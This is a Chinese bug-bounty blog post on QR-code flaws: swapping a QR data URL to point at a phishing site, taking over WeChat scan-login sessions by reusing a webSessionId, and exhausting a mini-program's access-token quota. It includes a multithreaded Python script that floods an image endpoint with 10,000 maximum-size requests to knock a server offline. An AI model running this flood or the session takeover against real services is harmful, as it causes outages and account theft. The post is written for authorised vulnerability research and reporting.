(SRC漏洞挖掘三) 二维码功能点
2023-8-27 20:46:58 Author: Z2O安全攻防(查看原文) 阅读量:50 收藏

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号团队不为此承担任何责任。

在漏洞挖掘过程中我们经常会遇到二维码,二维码出现的场景主要有支付状态下、扫描登录、扫码关注、扫码分享、扫码下载。针对生成二维码这个功能会产生什么样的漏洞呢?请让我一一给你讲解!

二维码劫持(方式一)

在我们进行支付时一般会出现一个二维码,还有进行扫码登录,微信分享篇文章时都会出现!很多生成这个二维码链接后面都会有一个URL地址,根据这个URL地址来生成二维码,你看下列案例。

生成一个二维码后,我们复制二维码地址,然后可以看到后面data值为一个URL地址,我们只需要将URL地址替换为钓鱼网站地址,对方扫码就能够跳转到钓鱼网站,这里添加为百度地址,用手机扫码后就会成功跳转到百度!这个一般是低危!

二维码劫持(方式二)

不知道你会不发现就是非常多的登录框,都支持微信扫码登录,而在这个微信扫码登录的过程会出现什么样的安全问题呢?一般流程

首先出现一个微信扫码登录使用微信扫完码后会跳转到一个微信公众号,点击关注公众号

关注玩公众号后会出现,类似以下需要点击授权界面

当我们点击授权的时候,就会发现浏览器Web端页面跳转,登录成功!回到最初的微信扫码登录点,浏览器会一直发送请求数据包进入一种循环状态,判断是否扫描了二维码。

我们任意访问一个上面的请求包,你会发现post body的其中一个参数,“webSessionId”,记住这个值:819xxxxxxxxx接下来我们去微信公众号中分析,先点击授权并抓包,你会发现有一个以下链接 https://xxx.aaa.com/api/login/auth?webSessionId=819xxxxxxxxx你可以惊奇的发现点击授权和我们浏览器中获取的值相同,这边有什么用呢?这是一个值得我们思考的问题,受害者扫码我们能否代替对方“点击授权”,我们有了webSessionId,可以自己构造点击授权的URL,然后使用自己的微信聊天框发送给自己的电脑,然后点击授权。模拟攻击思路:先发送一个链接给自己的电脑对话框好直接访问发送web端登录的二维码图片给受害者(这边有个限制就是必须在该二维码的有效时间扫描才有效)这要对方扫码后只要一点击前往图中包含的公众号,不管他后面如果操作都不用去管,我们只要不断的去点击上方对话框的链接看是否会到确认这一步即可,只要我们能够到这一步就能够获取到对方的账号权限。

拒绝服务漏洞(高危)

点击二维码登录并抓包

接口如下: https://wwww.xxx.com/xxxx/xxxx/v1/xxxx?width=162&height=162 该请求上面width和height参数控制服务器返回图片的大小

增大width和height值发现返回的数据也发生了变化、并且响应的时间也变长了

通过测试width和height最大为14000,要返回如此多的数据将是一个巨大的过程,直接使用Burp或者编写脚本进行批量请求就能够造成整个服务器拒绝服务,再其他产商也发现类似的漏洞,验证的时候可以这样排除干扰、使用2个网络:一个手机数据流量、一个是电脑所连接的WiFi、电脑进行ddos、手机使用数据流量、访问该链接,即可证明。将width和height值调到最大进行跑即可

import requests
import threading
import time

"""
    @ 单线程为测试,可忽略
    @ 使用时修改url即可
    @ 可根据实际情况修改访问次数,默认为10000
    @ 仅供学习参考,请勿实施攻击

"

""

# 访问指定Url
def requser():
    headers = {
        'User-Agent''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36'
    }
    # 将参数的设置为最大临界值的链接
    url = "https://www.xxxx.com/xxxx?width=14000&height=14000"
    # url = "https://www.baidu.com/"
    req = requests.get(url=url, headers=headers)
    print("resuest Success!")

# 单线程访问
def single_thread():
    for i in range(50):
        requser()
        print(f"现在是第{i}次请求网页")

# 多线程访问
def multi_thread():
    print("multi_thread begin")
    threads = []
    for i in range(10000):  # 10000为访问次数,可根据实际调整
        threads.append(
            threading.Thread(target=requser)
        )
    print(threads)
    for thread in threads:
        thread.start()

    for thread in threads:
        thread.join()
    print("multi_thread end")

if __name__ == '__main__':
    # 单线程
    # single_thread()
    # 多线程
    start = time.time()
    multi_thread()
    end = time.time()
    t = end - start
    print(f"multi thread cost:{t} s")

为防止服务器瘫痪这边我只是跑了几秒钟做了一个简单的测试然后马上关闭了,使用手机进行访问,直接一直加载中,整个服务器瘫痪,用到该服务器下的所有接口将全部不能用,危害极大,这边因为只跑了几秒,所以服务器很快就恢复了,这边要跑的时候记得跟产商沟通别瞎跑,小心服务器真的给你跑蹦了!一般说明到上面不用跑也能说明危害了,产商需要进一步证明的话就直接跟产商沟通。

小程序扫码登录

该功能点是通过微信小程序进行扫码登录,先点击个人登录抓个包试下

在这里插入图片描述

抓到这个接口数据包,返回一大串加密数据,该接口的字面意思就是获取微信的accesstoken

现在系统有太多这样使用微信小程序扫码登录的功能点了,所以我决定好好的去看看开发文档,以后说不一定能挖到非常多洞。通过开发文档了解到accesstoken是微信小程序的调用命脉

通过抓取的数据包知道上面的个人登录功能点是先获取accesstoken、再调用accesstoken来后去生成二维码。这里直接就获取微信小程序的accesstoken了、相当于无需知道appid和APPsecret就可以拿到accesstoken了,这里补充一下知识点。根据小程序开发手册,如果你获取到appid和secret的话那么就可以直接获取到accesstoken

https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid=APPID&secret=APPSECRET
在这里插入图片描述

利用该accesstoken去在线开发者工具平台上传一张图片证明accesstoken是微信小程序的accesstoken 如下:上传成功:后续可以根据开发者文档调用很多微信小程序的接口、危害大。还有微信开发者文档规定accesstoken一天只能获取两千次、可以通过该接口不断获取接口accesstoken、从而导致奔溃、后续只要有用到accesstoken的功能点和小程序都会无法使用为了不影响业务在快凌晨12点的时候进行了测试复现Burp不断请求、一分钟不到就获取不到accesstoken尝试进行登录,已经无法获取到二维码了、并且很多内容都是需要登录才可以进行查看的,危害非常大。

知识星球

致力于红蓝对抗,实战攻防,星球不定时更新内外网攻防渗透技巧,以及最新学习研究成果等。常态化更新最新安全动态。专题更新奇技淫巧小Tips及实战案例。

涉及方向包括Web渗透、免杀绕过、内网攻防、代码审计、应急响应、云安全。星球中已发布 300+ 安全资源,针对网络安全成员的普遍水平,并为星友提供了教程、工具、POC&EXP以及各种学习笔记等等。(点我了解详情)

交流群

关注公众号回复“加群”,添加Z2OBot好友,自动拉你加入Z2O安全攻防交流群(微信群)分享更多好东西。(QQ群可直接扫码添加)

关注我们

关注福利:

回复“app" 获取  app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

回复“资料" 获取 网络安全、渗透测试相关资料文档

点个【 在看 】,你最好看


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247501987&idx=1&sn=3b06fbde34cbd718407dfd6e51bb53bc&chksm=ceab23e3f9dcaaf5017bccfb5dae627bc298cc95e64144af93b89e6bf01034bbf318534f3e62&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh